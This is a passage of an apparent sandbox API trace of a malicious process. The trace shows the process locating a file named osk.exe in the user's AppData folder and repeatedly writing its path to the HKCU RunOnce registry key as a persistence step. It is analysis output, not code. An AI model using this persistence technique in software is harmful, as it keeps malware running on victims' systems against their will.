out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0091.926] RegCloseKey (hKey=0x280) returned 0x0 [0091.926] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.926] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.927] SetTimer (hWnd=0x20280, nIDEvent=0x21dd, uElapse=0xa, lpTimerFunc=0x0) returned 0x21dd [0091.927] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0091.936] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0091.936] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0091.937] KillTimer (hWnd=0x20280, uIDEvent=0x21dd) returned 1 [0091.937] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.937] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0091.937] IUnknown:Release (This=0x787518) returned 0x1 [0091.937] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0091.938] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0091.938] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, 
wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0091.938] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0091.938] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0091.938] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0091.938] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0091.938] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0091.938] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0091.938] 
FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x62 [0091.939] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0091.939] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x63 [0091.939] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0091.940] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x62 [0091.940] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.940] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0091.940] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.940] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.940] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0091.940] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0091.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, 
lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0091.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0091.941] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0091.941] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0091.941] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0091.941] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0091.941] RegCloseKey (hKey=0x280) returned 0x0 [0091.941] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.941] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.942] SetTimer (hWnd=0x20280, nIDEvent=0x21de, uElapse=0xa, lpTimerFunc=0x0) returned 0x21de [0091.942] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0091.952] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0091.952] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0091.952] KillTimer (hWnd=0x20280, uIDEvent=0x21de) returned 1 [0091.952] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.952] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, 
Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0091.953] IUnknown:Release (This=0x787518) returned 0x1 [0091.953] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0091.953] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0091.953] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0091.953] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0091.953] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 
[0091.953] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0091.953] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0091.953] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0091.953] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0091.954] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x63 [0091.954] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0091.954] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x64 [0091.954] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, 
puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0091.955] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x63 [0091.955] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.955] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0091.955] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.955] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.955] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0091.955] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0091.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0091.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0091.955] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0091.955] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, 
lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0091.956] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0091.956] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0091.956] RegCloseKey (hKey=0x280) returned 0x0 [0091.956] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.956] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.956] SetTimer (hWnd=0x20280, nIDEvent=0x21df, uElapse=0xa, lpTimerFunc=0x0) returned 0x21df [0091.956] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0091.967] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0091.967] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0091.968] KillTimer (hWnd=0x20280, uIDEvent=0x21df) returned 1 [0091.968] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.968] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0091.968] IUnknown:Release (This=0x787518) returned 0x1 [0091.968] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0091.968] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0091.968] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), 
lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0091.969] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0091.969] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0091.969] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0091.969] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0091.969] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), 
ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0091.969] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0091.969] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x64 [0091.969] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0091.969] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x65 [0091.969] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0091.970] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x64 [0091.970] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.970] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0091.970] IUnknown:Release (This=0x7a9740) 
returned 0x1 [0091.970] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.970] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0091.970] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0091.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0091.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0091.970] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0091.970] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0091.971] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0091.971] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0091.971] RegCloseKey (hKey=0x280) returned 0x0 [0091.971] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.971] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.971] SetTimer (hWnd=0x20280, nIDEvent=0x21e0, uElapse=0xa, lpTimerFunc=0x0) returned 0x21e0 [0091.971] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0091.983] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0091.983] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0091.983] KillTimer (hWnd=0x20280, uIDEvent=0x21e0) returned 1 [0091.984] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.984] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0091.984] IUnknown:Release (This=0x787518) returned 0x1 [0091.984] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0091.984] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0091.984] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, 